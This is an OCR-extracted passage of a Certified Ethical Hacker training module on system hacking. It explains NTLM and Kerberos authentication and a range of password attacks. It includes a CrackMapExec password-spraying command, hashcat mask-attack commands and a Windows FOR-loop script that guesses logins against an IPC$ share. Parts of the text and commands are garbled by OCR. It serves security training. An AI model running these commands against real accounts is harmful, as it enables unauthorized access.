response with the response it created with its own hash } ifthey match, logonis a
E success
Computer sends response to challenge
Aa
r8
ppq
kgj89
par
Figure 6.4: NTLM authentication process
The following steps demonstrate the process and the flow of client authentication to a domain controller using any NTLM protocol:
=
The client types the username and password into the logon window.
Module 06 Page 589
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
=
Windows runs the password through a hash algorithm and generates a hash for the password that is entered in the logon window.
=
The client computer sends a login request along with a domain controller.
=
The domain controller generates a 16-byte random which it sends to the client computer.
=
The client computer encrypts the nonce with a hash of the user password and sends it back to the domain controller.
=
The domain controller retrieves the hash of the user password from the SAM and uses it to encrypt the nonce. The domain controller then compares the encrypted value with the value received from the client. A matching value authenticates the client, and the logon is successful.
name
to the domain
character string called a “nonce,”
Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides a stronger authentication for client/server applications than NTLM.
Module 06 Page 590
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Kerberos Authentication
CE H Key Distribution Center (KDC)
User request to the authentication server t...>) v
Reply of authentication server to the user request
> Replyof the TGS to the client’s request
Authentication Server (AS)
|
. til
Database
=
—
client is expecting
Application Server Figure 6.5: Kerberos authentication process
Kerberos employs the KDC, which a trusted third party, and consists of two logically distinct parts: an AS and a TGS. The authorization mechanism of Kerberos provides the user with a ticket-granting ticket (TGT) that serves post-authentication for later access to specific services, Module 06 Page 591
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Single Sign-On via which the user need not re-enter the password again to access any authorized services. Notably, there is no direct communication between the application servers and the KDC; the service tickets, even if packed by TGS, reach the service only through the client who is willing to access them.
Module 06 Page 592
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Password Cracking ‘@
CE H
Password cracking techniques are used to recover passwords from computer systems
‘@
Attackers use password cracking techniques to gain unauthorized access to
©
Most of the password cracking techniques are successful because of weak
vulnerable systems
_ a)
Baan
or easily guessable passwords
Password Cracking Password cracking is the process computer system or from the data help a user recover a forgotten administrators to check for easily unauthorized system access.
of recovering passwords from the data transmitted by a stored in it. The purpose of cracking a password might be to or lost password, as a preventive measure by system breakable passwords, or for use by an attacker to gain
Hacking often begins with password-cracking attempts. A password is a key piece of information necessary to access a system. Consequently, most attackers use password-cracking techniques to gain unauthorized access. An attacker may either crack a password manually by guessing it or use automated tools and techniques such as a dictionary or a brute-force method. Most password-cracking techniques are successful because of weak or easily guessable passwords.
Module 06 Page 593
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Types of Password Attacks .
ig iE H
The attacker does not need technical knowledge to crack the password, hence it is known
Non-Electronic | asa non-technical attack Attacks Shoulder Sutng Social Engncerng Active Online
Attacks
Passive Online
Attacks
Offline Attacks
© Dumpster Oving
The attacker performs password cracking by directly communicating with the victim’s machine © Dictionary, Brute Forcing, and Rule-based Attack
© Trojan/Spyware/Keyloggers
© Hash Injection Attack/Mask Attack © ULMNR/NBT-NS Poisoning
© Password Guessing/Spraying © Internal Monologue Attack
© Cracking Kerberos Passwords
The attacker performs password cracking without communicating with the authorizing party ©
Wire Sniffing
@
Man-in-the-Middle Attack
©
Replay Attack
The attacker copies the target’s password file and then tries to crack passwords on his own | systemat.a different location © Rainbow Table Attack (Pre-Computed Hashes)
© Distributed Network Attack
Types of Password Attacks Password cracking is one of the crucial stages of system hacking. Password-cracking mechanisms often exploit otherwise legal means to gain unauthorized system access, such as recovering a user’s forgotten password. Classification of password attacks depends on the attacker’s actions, which are of the following four types: Non-Electronic Attacks: This is, for most cases, the attacker’s first attempt at gaining target system passwords. Non-electronic or non-technical attacks do not require any technical knowledge about hacking or system exploitation. Techniques used to perform non-electronic attacks include shoulder surfing, social engineering, dumpster diving, etc. Active Online Attacks: This is one of the easiest ways to gain unauthorized administrator-level system access. Here, the attacker communicates with the target machine to gain password access. Techniques used to perform active online attacks include password guessing, dictionary and brute-forcing attacks, password spraying, mask attack, hash injection, LLMNR/NBT-NS poisoning, use of Trojans/spyware/keyloggers, internal monologue attacks, Markov-chain attacks, Kerberos password cracking, etc.
Passive Online Attacks: A passive attack is a type of system attack that does not lead to any changes in the system. In this attack, the attacker does not have to communicate with the system, but passively monitor or record the data passing over the communication channel, to and from the system. The data are then used to break into the system. Techniques used to perform passive online attacks include wire sniffing, man-in-the-middle attacks, replay attacks, etc.
Module 06 Page 594
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Offline Attacks: Offline attacks refer to password attacks in which an attacker tries to recover cleartext passwords from a password hash dump. Attackers use pre-computed hashes from rainbow tables to perform offline and distributed network attacks.
Module 06 Page 595
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Non-Electronic Attacks Social
Engineering @
C iE H
=
Convincing people to reveal passwords
——,
‘@
Shoulder
Surfing
a
——\
Looking at either the
‘@
user’s keyboard or screen while he/she is logging in
Dumpster
Diving
Searching for sensitive information in the user’s trash-bins, printer trash bins, and in/on the user’s
desk for sticky notes
Copyright © by
Non-Electronic Attacks There are three dumpster diving.
types
of non-electronic
attacks:
social
engineering,
shoulder
surfing,
and
Social Engineering
In computer security, social engineering is used to denote a non-technical type of intrusion that exploits human behavior. Typically, it heavily relies on human interaction and often involves tricking other people into breaking normal security procedures. A social engineer runs a “con game” to break security procedures. For example, an attacker using social engineering to break into a computer network might try to gain the trust of the authorized user to access the target network and then extract information to compromise network security. Social engineering is, in effect, a run-through used to procure confidential information by deceiving or swaying people. An attacker can disguise himself/herself as a user or system administrator to obtain the user’s password. Social engineers exploit the fact that people, in general, try to build amicable relationships with their friends and colleagues and tend to be helpful and trusting. Another trait of social engineering relies on the inability of people to keep up with a culture that relies heavily on information technology. Most people are unaware of the value of the information they possess, and as such, only a handful care about protecting their information. Social engineers typically search dumpsters to acquire valuable information. Furthermore, social engineers find it more challenging to obtain the
combination to a safe, or a health-club locker, as compared to the case of a password. The best defense is to educate, train, and create awareness about this attack and the value of information.
Module 06 Page 596
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
=
Exam 312-50 Certified Ethical Hacker
Shoulder Surfing Shoulder surfing is a technique of stealing passwords by hovering near the legitimate users and watching them enter their passwords. In this type of an attack, the attacker observes the user’s keyboard or the screen as they log in, and monitors what the user refers to when entering their password, for example, an object on their desk for written passwords or mnemonics. However, this attack can be performed only when the attacker is in close proximity to the target. This attack can also be performed in the checkout lines of grocery stores, for example, when a potential victim swipes a debit card and enters the required PIN (Personal Identification Number). A PIN typically has four digits, and this renders the attack easy to perform.
=
Dumpster Diving
“Dumpster diving” is a key attack method that employs significant failures in computer security in the target system. The sensitive information that people crave, protect, and devotedly secure can be accessed by almost anyone willing to perform garbage searching. Looking through the trash is a type of low-tech attack with numerous implications. Dumpster diving was quite popular in the 1980s. The term itself refers to the collection of useful, general information from waste dumps such as trashcans, curbside containers, and dumpsters. Even today, curious and/or malicious attackers sometimes find discarded media with password files, manuals, reports, receipts, credit card numbers, or other sensitive documents. Examination of waste products from dumps can help attackers in gaining unauthorized access to the target systems, and there is ample evidence to support this concept. Support staff often dump sensitive information without heeding to who may be able to access it later. The information thus gathered can then be used by attackers to perform other types of attacks, such as social engineering.
Module 06 Page 597
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Active Online Attacks: Dictionary, Brute-Force, and
cE H
ce ne
Rule-based Attack
Dictionary Attack
Brute-Force Attack
Rule-based Attack
@ Adictionary file is loaded
@ The program tries every
——
—
into the cracking application that runs against user accounts
combination of characters until the password is broken
—
@ This attack is used when the attacker gets some information about the password
see
‘'— Al RightsReserved. Reproduction
Active Online Attacks: Password Spraying Attack and
¢ IE H
emf
Mask Attack
Password Spraying Attack
Mask Attack
and crack @ Attackers target multiple user accounts simultaneously the passwords using a small set of commonly used passwords
© Attackers recover passwords from hashes with a specific set of characters based on some
the password spraying @ Attackers use CrackiMapExec to automate processto crack domain or workgroup members’ passwords
‘etes/aithab com
Module 06 Page 598
information known to the attacker
© Attacker use hashcat to performa mask attack
https:/fasheat.net Al Rights Reserved. Reproduction is
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Active Online Attacks: Password Guessing
CEH
The attacker creates a list of all possible
Frequency of attacksis less
passwords from the information collected
through social engineering or any other way and manually inputs them on the victim’s machine to crack the passwords
Find a valid user
Create a list of 7
possible passwords
Failure rate is high
Rank passwords pi from high to low
Key in each password, until the ,
Probabaty
discovered
babilit
correct password
Default Passwords
is
CE H
@ A default password isa password supplied by the manufacturer with new equipment(e.g., switches, hubs, routers) that is password protected @ Attackers use default passwords presentin the list of words or dictionary that they use to perform password guessing attack
PASSuORDS Open Sez Me! : Passwords
Online Tools to Search Default Passwords
‘econ Sa ton tm Click heres suse ser ponoe wnae
e https://www.fortypoundhead.com ©
‘oe
ottenoe
© http://www.defaultpassword.us ©
https://www.routerpasswords.com
So
© https://default-password.info
=
© https://192-168-1-1ip.mobi
(ilps Jopen ser me
Module 06 Page 599
https://cirt.net
Al Rights Reserved.
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Active Online Attacks: Trojans/Spyware/Keyloggers
CE H
‘@
The attacker installs a Trojan/Spyware/Keylogger on the victim's machine to collect the victim's usernames
@
The Trojan/Spyware/Keylogger runs in the background and sends back all user credentials to the attacker
and passwords
‘Attacker infects victim's local PC
Attacker
Victim logs on to the domain server with his/her credenti
Trojan/spyware/keylogger sends login credentialsto attacker
Domain Server
ae
Active Online Attacks: Hash Injection/Pass-the-Hash (PtH) Attack
CE H
@ Ahash injection/Pth attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources @ The attacker finds and extracts a logged-on domain admin account hash ‘@
The attacker uses the extracted hash to log on to the domain controller
Logged-on hashes are storedin the SAM file User logs on
Compromises server ia >
User Server {Domain Controller)
Extracts a logged-on domain admin accounthash
Injecta compromised hash User Computer
Module 06 Page 600
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Active Online Attacks: LLMNR/NBT-NS Poisoning
CE H
LLMNR/NBT-NS Spoofing Tool: Responder :
@ LLMNRand NBT-NS are the two main elements of Windows operating systems that are used to perform name resolution for hosts present on the same link
@
The attacker cracks the NTLMv2 hash obtained from the victim’s
@
The extracted credentials are used to log on to the host systemin
authentication process
the network
User performs ‘anyone knows \\otaser
User sends incorrect
Data Server
Nose - NOT FOUND
User
Attacker responds saying that he knows \\ptaServr, accepts NTLMv2 hash and then sends an ERROR MSG
CEH
Active Online Attacks: Internal Monologue Attack
@ Attackers perform an internal monologue attack using SSPI (Security Support Provider Interface) from a user-mode application, where a local procedure call to the NTLM authentication package is invoked to calculatethe NetNTLM. response in the context of the logged-on user Q Crack the NTLM hash using rainbow tables
Q..
a Attacker
Disable the security controls of NetNTLMv1. Interact with NTLM SSP locally to obtain NetNTLMv1 response
e
Restore the security controls of NetNTLMv1.
— Server
Use the cracked hashes
Client y Prohibited.
Module 06 Page 601
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Active Online Attacks: Cracking Kerberos Password AS-REP Roasting (Cracking TGT)
@ Attackers request a TGT fromthe KDC in the form of the an AS-REQ packet and crack the ticket to obtain the user’s password
CEH
Kerberoasting (Cracking TGS)
|@ Attackers request a TGS for the SPN of the target service account and crack the ticket to obtain the user’s password
Domain Controller/ KDC
Domain Controller/ KDC Request TGS Receive TGS.
*@*
crack 16s, obtain re password
Discover user
‘account with pre‘authentication disabled
sexton Applicat
actor
Server
right © by
Active Online Attacks: Pass the Ticket Attack ©
Pass the Ticket is a technique used for
authenticatinga user toa systemthatisusing |) v4. : os : limikatz Kerberos without providing the user's Password
@
CE H
TGT to Mimikatzallows attackers to pass Kerberos
other computersand sign in using the victim’s ticket aplaintext passwords, hashes, © Italso helpsin; extracting PIN codes, and Kerberos tickets from memory
|G To perform this attack, the attacker dumps. Kerberos tickets of legitimate accounts using credential dumping tools (@ The attackerthen launchesa pass the ticket
attackeither by stealing the ST/TGT from an end-user machine, or by stealing the ST/TGT from a compromised Authorization Server |@ The attacker uses the retrieved ticket to gain unauthorized access to the target network services @
Toolssuch as Mimikatz, Rubeus, and Windows
Credentials Editorare used by attackersto launch such attacks
y Prohibited.
Module 06 Page 602
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Other Active Online Attacks
C iE H
Combinator
|
|@ Attackers combine the entriesof one dictionary with those of a second dictionary to generate a new
Fingerprint Attack
|
|@ Attackers break down the passphrase into fingerprints comprising single and multi-character combinations to crack complex passwords
PRINCE Attack
|
@ Itis an advanced version of a combinator attack, where attackers use a single input dictionary to build chains of combined words instead of taking input from two different dictionaries
Toggle-Case
|
|@ Attackers attempt all possible combinations of uppercase and lowercase versions of a word present
Attack
Attack
wordlist to crack the password of the target system
in the input dictionary
| Attackers gather a password database and split each password entry into 2- and 3-character-long Markov-Chain |“ sviiables; using these character elements, a new alphabetis developed, which is then matched with Attack the existing password database
GPU-based Attack
| @ Attackers exploit the OpenGL API on GPUs to set up a spy on the victim device that infers user activities and passwords entered on a browser
Active Online Attacks Dictionary Attack
In this type of attack, a dictionary file is loaded into a cracking application that runs against user accounts. This dictionary is a text file that contains several dictionary words commonly used as passwords. The program uses every word present in the dictionary to find the password. In addition to a standard dictionary, an attackers’ dictionaries contain entries with numbers and symbols added to words (e.g., “3December!962”). Simple keyboard finger rolls (“qwer0987”), which many believe to produce random and secure passwords, are thus included in such a dictionary. Dictionary attacks are more useful than brute-force attacks, however, the former cannot be performed in systems
using passphrases.
This attack is applicable in two situations: o
In cryptanalysis, to discover the decryption ciphertext
key for obtaining the plaintext from a
o
Incomputer security, to bypass authentication and access the control mechanism of the computer by guessing passwords
Methods to improve the success of a dictionary attack: o
Use
of several
different
dictionaries,
such
as technical
and
foreign
dictionaries,
which increases the number of possibilities o
Use of string manipulation along with the dictionary (e.g., if the dictionary contains the word “system,” string manipulation creates anagrams like “metsys,” among others)
Module 06 Page 603
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Brute-Force Attack In a brute-force attack, attackers try every combination of characters until the password is broken. Cryptographic algorithms must be sufficiently hardened to prevent a bruteforce attack, which is defined by the RSA as follows: “Exhaustive key-search, or bruteforce search, is the basic technique for trying every possible key in turn until the correct key is identified.” A brute-force attack is when someone tries to produce every single encryption key for data to detect the needed information. Even today, only those with enough processing power could successfully perform this type of attack.
Cryptanalysis is a brute-force attack on encryption that employs a search of the keyspace. In other words, testing all possible keys is one of the attempts to recover the plaintext used to produce a particular ciphertext. The detection of a key or plaintext that is faster than a brute-force attack is one way of breaking the cipher. A cipher is secure if no method exists to break it other than a brute-force attack. In general, all ciphers are deficient in mathematical proof of security. If the user chooses keys randomly or searches randomly, the plaintext will become available on average after the system has tried half of all the possible keys. Some of the considerations for brute-force attacks are as follows: o.
Itis a time-consuming process
o
All passwords will eventually be found
Rule-based Attack Attackers use this type of attack when they obtain some information about the password. This is a more powerful attack than dictionary and brute-force attacks because the cracker knows the password type. For example, if the attacker knows that the password contains a two- or three-digit number, he/she can use some specific techniques to extract the password quickly. By obtaining useful information, such as the characters have been used, and password required to crack the password and therefore involves brute force, a dictionary, and syllable
method in which numbers and/or special length, attackers can minimize the time enhance the cracking tool. This technique attacks.
For online password-cracking attacks, an attacker will sometimes use a combination of both brute force and a dictionary. This combination falls into the categories of hybrid and syllable password-cracking attacks. o
Hybrid Attack This type of attack depends on the dictionary attack. Often, people passwords merely by adding some numbers to their old passwords. In program would add some numbers and symbols to the words from the try to crack the password. For example, if the old password is “system,” a chance that the person will change it to “system1” or “system2.”
Module 06 Page 604
change their this case, the dictionary to then there is
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking o
Exam 312-50 Certified Ethical Hacker
Syllable Attack
Hackers use this cracking technique when passwords are not known words. Attackers use the dictionary and other methods to crack them, as well as all possible combinations of them. =
Password Spraying Attack Password spraying attack targets multiple user accounts simultaneously using one or a small set of commonly used passwords. Unlike brute-force attacks, which target only specific user accounts, a password spraying attack targets every user within a specific workgroup. To perform this attack, attackers mainly focus on exploiting the account lockout policy, which allows users to use multiple passwords for a certain period or a certain number of attempts before their accounts are locked. Attackers initially attempt a single commonly used password on multiple accounts simultaneously and wait for the response before initiating another password attempt on the same accounts. They continue this process while remaining under the lockout threshold so that they can try a large number of passwords without being affected by automatic lockout mechanisms. Password spraying can be performed at different stages through common ports such as
MSSQL (1433/TCP), SSH (22/TCP), FTP (21/TCP), SMB (445/TCP), Telnet (23/TCP), and Kerberos (88/TCP).
workgroup
Target organization's working group Figure 6.6: Illustration of password spraying attack
Attackers use tools such as CrackMapExec to perform password spraying attacks. o
CrackMapExec
Source: https://github.com Attackers use the CrackMapExec tool to automate the password cracking process of an entire domain or workgroup member passwords using a small set of commonly Module 06 Page 605
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
used passwords stored in a .txt file. The following command executes CrackMapExec tool with the passwords stored in the file passwords.txt: crackmapexec
smb
Run the following command
spraying process:
-u
users.txt
-p
the
passwords.txt
to cross-check whether
lockout occurred
during the
spray.sh -smb
Figure 6.7: Screenshot of CrackMapExec The following are some additional password spraying attack tools:
=
o
Kerbrute (https://github.com)
o
Invoke-DomainPasswordSpray (https://github.com)
o.
Spray (https://github.com)
o
Omnispray (https://github.com)
Mask Attack Mask attack is similar to brute-force attacks but recovers passwords from hashes with a more specific set of characters based on information known to the attacker. Brute-force attacks are time-consuming because the attacker tries all possible combinations of characters to crack the password. In contrast, in a mask attack, the attacker uses a pattern of the password to narrow down the list of possible passwords and reduce the cracking time.
Module 06 Page 606
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking o
Exam 312-50 Certified Ethical Hacker
hashcat Source: https://hashcat.net Attackers use the hashcat tool to perform password attacks such as brute-force attacks, dictionary attacks, and mask attacks. To perform mask attacks, an attacker must know the flags used for the built-in charset, custom charset, and attack mode to create an appropriate pattern for the password. Built-in Charsets The following built-in charset helps specify the type of character to be used: e
?1
=
abcdefghijklmnopqrstuvwxyz
¢
?u
= ABCDEFGHIJKLMNOPQRSTUVWXYZ
e
?d
=
0123456789
e
?h
=
0123456789abcdef
e
?H
=
0123456789ABCDEF
©
?s
= «space»! "#$%&' ()*+,-./:;?2@[\]*_{l}~
e
?a
=
?1?u?d?s
e
?b
=
0x00
-
Oxff
Custom Charset A custom charset is used in situations where the attacker is unsure about the type of character in a particular placeholder: e
-1
abcdefghijklmnopqrstuvwxyz0123456789
e
-1
abcdefghijklmnopgqrstuvwxyz?d
e
-1
210123456789
e
-1
212d
Hash Mode Attackers use the -m flag with hashcat to specify the hash mode, that is, the type of hash to crack, such as MD5, NTML, or SHA256. Run the following command to crack passwords that contain six characters, in which the first three are lowercase alphabets and the last three characters are numbers. The password pattern appears to be ?1?1?1?d?d?d. hashcat
-a
3
-m
0
md5_hashes.txt
?1?71?1?d?d?d
-a > Specifies the attack mode, which is 3 here (brute-force attack) -m > Specifies the hash type, which is 0 here (MD5)
Module 06 Page 607
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
advanced password recovery shcat [
++ hash|hashfile|hccapxfile [dicttonary|mask|dtrectory]...
[ Options ] Type | Descriptio
| Example m 1000 -a3
quiet hex-charset salt wordlist ce tus tus-timer
given tn hex en in hex rdlist are given t
s Num
jin-timeout-abort timeout - abort=300
N
| Se
etween
s
een updat:
Abort if there ts no input from stdin for x Display the st few in a machine-readable format Keep guessing the hash after tt has been cracked e t func ‘0 induct
-disable
tng new markov f runtime
untin
Figure 6.8: Screenshot of hashcat
Run the following command to crack passwords that are eight characters in length, where the first character is either an uppercase or a lowercase letter, the last four characters are digits, the first two digits are 1 and 9, and the remaining characters are lowercase letters. hashcat
-a
3
-m
0
md5_hashes.txt
-1 21?u alphabet
>
Specifies that the character
-1
?1?u
?1?71?1?7119?d?d
is either an uppercase
or a lowercase
To crack a password hash of unknown length, use the --increment providing the maximum and minimum length of the password.
flag
by
hashcat -m 0 -a 3 -i --increment-min=6 --increment-max=10 53ab0df£8ecc7d5a18b4416d00568£02 717171717171717127171
--increment-min=6 --increment-max=10 =
> Minimum length of the password is 6 > Maximum length of the password is 10
Password Guessing Password guessing is a password-cracking technique that involves attempting to log on to the target system with different passwords manually. Guessing is the key element of manual password cracking. The attacker creates a list of all possible passwords from the information collected through social engineering or any other method and tries them manually on the victim’s machine to crack the passwords.
Module 06 Page 608
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
The following are the steps involved in password guessing: o
Finda
valid user
o
Create a list of possible passwords
o
Rank passwords from high to low probability
o
Key in each password, until the correct password is discovered
Hackers can crack passwords manually or by using automated tools, methods, and algorithms. They can also automate password cracking using a simple FOR loop, or create a script file that tries each password in a list. These techniques are still considered manual cracking. The failure rate of this type of attack is high. Manual Password-Cracking Algorithm In its simplest form, this algorithm can automate password guessing using a simple FOR loop. In the example that follows, an attacker creates a simple text file with usernames and passwords and iterates them using the FOR loop. The main FOR loop can extract the usernames and passwords from the text file, which serves as a dictionary as it iterates through every line: [file:
credentials.txt]
administrator
""
administrator
password
administrator
administrator
[Etc.] Type the following commands to access the text file from a directory: c:\>FOR
/F
"tokens=1,2*"
More?
do
More?
2>>nul*
More?
&&
echo
%time%
More?
&&
echo
\\victim.com
c:\>type
net
use
%i
in
(credentials.txt) *
\\victim.com\IPC$
%date%
>> acct:
%j
/u:victim.com\%i*
outfile.txt* %i
pass:
%j
>>
outfile.txt
outfile.txt
The outfile.txt file contains the correct username and password, if the username and password in credentials.txt are correct. An attacker can establish an open session with the victim server using his/her system. Default Passwords Default passwords are those supplied by manufacturers with new equipment (e.g., switches, hubs, routers). Usually, default passwords provided by the manufacturers of password-protected devices allow the user to access the device during the initial setup and then change the password. However, often an administrator will either forget to set the new password or ignore the password-change recommendation and continue using the original password. Attackers can exploit this lapse and find the default password for Module 06 Page 609
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacki ing
Exam 312-50 Certified Ethical Hacker
the target device from manufacturer websites or using online tools that show default passwords to access the target device successfully. Attackers use default passwords in the list of words or dictionary that they use to perform password-guessing attacks. The following are some of the online tools to search default passwords:
©
https://open-sez.me
0
https://www.fortypoundhead.com
o
Attps://cirt.net
0
http://www.defaultpassword.us
o
https://www.routerpasswords.com
o
Ahttps://default-password.info
0.
https://192-168-1-1ip.mobi
PASSWORDS
Open Sez Me! :: Passwords
106 Default Passwords for thousands of systems from 782 vendors!
ast Updated: 12/20/2021 423:35 PM To begin, Select the vendor ofthe product you are lookingfor. Click here to ada new default passwords to this ist
$Top 26 Most Used
*Top 20 Most Used
Neti
Wire
360 Systems
3BB
3Com Accelerated Networks
360 ACCONET
3M Accton
3ware Aceex
Abocom Acer
ACC Acorp
ACTT
Actiontec
Adaptec
Adaptive Micro
ADB
ADC Kentrox
AdComplete.com Adtech
AddTron Adtran
ADIC Advanced
Adobe Advantek Networks
ADP Aerohive
ADT Aethra
Agasio
Agere
AIRAYA
Airlinkio1
Airnet
Airtight Networks
AirVast
‘Airway
Aladdin
Alaxala
Alcatel Lucent
Alcatel
Alfa Network
Alice
Alien Technology
Allied Data
Allied Telesyn
Allied
Allnet
Allot
Alpha
Alteon
Alvarion
Ambicom
Ambit
Amped Wireless
AMI
Amptron
Amigo
AMX
Amino
Andover Controls
AMIT
Anker
Amitech
AOpen
Apache
APC
Apple
ARC Wireless
Arcor
Areca
Arescom
Arlotto
ARRIS:
Arrowpoint
Artem
Asante
Ascend
Ascom
Asmack
Asmax
Aspect
AST
‘Asus
‘AT&T
Atcom
Atheros
Atlantis
Atlassian
Attachmate
Audioactive
Autodesk
Avaya
Avenger News
Passwords
ATM PINs:
Integration
Systems
aoc
System
Figure 6.9: Screenshot showing default passwords
=
Trojans/Spyware/Keyloggers A Trojan is a program that masks itself as appears to perform a desirable or benign harms the system. With a Trojan, attackers operations limited by user privileges on the
Module 06 Page 610
a benign application. The software initially function, but instead steals information or can gain remote access and perform various target computer. Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Spyware is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge. Spyware hides itself from the user and can be difficult to detect. A keylogger is a program that records all user keystrokes without the user’s knowledge.
Keyloggers ship the log of user keystrokes to an attacker’s machine or hide it in the victim’s machine for later retrieval. The attacker then scrutinizes the log to find passwords or other useful information that could compromise the system. An attacker installs a Trojan/spyware/keylogger on a victim’s machine to collect their usernames and passwords. These programs run in the background and send back all user credentials to the attacker. For example, a key logger on a victim’s computer can reveal the contents of all user emails. The following image depicts a scenario describing how an attacker gains password access using a Trojan/spyware/keylogger. 7)
Attacker! :
Attacker infects victim's local PC with Trojan/spyware/keylogger >
isha ker attacker
;i
Domain- Server
Figure 6.10: Active online attack using Trojan/spyware/keylogger
=
Hash Injection/Pass-the-Hash (PtH) Attack This type of attack is possible when the target system uses a hash function as part of the authentication process to authenticate its users. Generally, the system stores hash values of the credentials in the SAM database/file on a Windows computer. In such cases, the server computes the hash value of the user-submitted credentials or allows the user to input the hash value directly. The server then checks it against the stored hash value for authentication. Le
d-on
Compromises server
hash
ig a local/remote exploit"
Pananrmiapeetate stored in the SAM file seeeeee!j a
3)
User Server
Extracts a logged-on domai admin account hash
(Domain Controller)
ject a compromised hash into a local session User Computer
Attacker Figure 6.11: Hash injection attack
Module 06 Page 611
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Attackers exploit such authentication mechanisms and first exploit the target server to retrieve the hashes from the SAM databases. They then input the hashes acquired directly into the authentication mechanism to authenticate with the user’s stolen precomputed hashes. Thus, in a hash injection/PtH attack, the attackers inject a compromised LanMan (LM) or NTLM hash into a local session and then use the hash to authenticate to the network resources. Any server or service (running on Windows, UNIX, or any other OS) using NTLM or LM authentication is susceptible to this attack. This attack can be launched on any OS, but Windows could be more vulnerable owing to its Single-Sign-On (SSO) feature that stores passwords inside the system and enables users to access all the resources with a one-time login. Different techniques are used to perform a hash injection/PtH attack: o
The attacker tries to compromise
admin
user’s
local
password
hashes
from
the
privileges to capture cache values of the user account
database
or SAM.
However,
offline usage of these cached hashes can be restricted by the network admin. Hence, this approach may not always be feasible. o
The attacker dumps the password hashes from the local user account database or SAM to retrieve password hashes of local users, and gains access to admin accounts to compromise other connected systems.
o
The attacker captures LM or NTLM challenge—-response messages between the client and server to extract encrypted hashes through brute-forcing.
oO.
The attacker retrieves the credentials of local users as well as those belonging to the security domain from the Windows Isass.exe process.
The hacker carries out this attack by implementing the following five steps:
=
©
The hacker compromises one workstation/server using a local/remote exploit.
o
The hacker extracts stored hashes using tools such as pwdump7, finds a domain admin account hash.
o
The hacker uses tools such as Mimikatz to place one of the retrieved hashes in his/her local Isass.exe process and then uses the hash to log on to any system (domain controller) with the same credentials.
o.
The hacker extracts all the hashes from the Active Directory database and can now compromise any account in the domain.
Mimikatz, etc. and
LLMNR/NBT-NS Poisoning LLMNR (Link Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows OSs used to perform name resolution for hosts present on the same link. These services are enabled by default in Windows OSs. When the DNS server fails to resolve name queries, the host performs an unauthenticated UDP broadcast asking all the hosts if anyone has a name that it is looking for. As the host trying to connect is following an unauthenticated and broadcast
Module 06 Page 612
